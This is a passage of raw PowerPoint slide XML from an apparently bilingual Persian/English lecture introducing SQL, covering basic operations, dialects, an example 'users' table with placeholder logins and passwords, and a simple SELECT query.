                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>execute queries against a database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noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>retrieve data from a database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noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>insert new records in a database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noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>delete records from a database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noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>update records in a database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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219200" y="152400"/>
            <a:ext cx="7620000"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r" rtl="1" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> استاندارد است ولي ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8153400" cy="4830763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>There are many different versions of the SQL language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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26</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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43000" y="152400"/>
            <a:ext cx="6934200"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l" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL Database Tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="8229600" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A relational database contains one or more tables identified each by a name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Tables contain records (rows) with data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>For example, the following table is called "users" and contains data distributed in rows and columns:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="3962400"/>
          <a:ext cx="7921625" cy="2022476"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1296987"/>
                <a:gridCol w="1655763"/>
                <a:gridCol w="1655762"/>
                <a:gridCol w="1657350"/>
                <a:gridCol w="1655763"/>
              </a:tblGrid>
              <a:tr h="506413">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>userID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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LastName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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Login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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Password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p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma"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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>John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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Smith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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jsmith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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>hello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413">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma"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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Adam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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Taylor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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>adamt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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>qwerty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p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma"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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Daniel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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Thompson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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dthompson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ebdings" pitchFamily="18" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dthompson</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="20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27</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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219200" y="198438"/>
            <a:ext cx="5943600"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l" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL Queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1295400"/>
            <a:ext cx="8229600" cy="4830763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>With SQL, we can query a database and have a result set returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Using the previous table, a query like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>LastName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>FROM users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
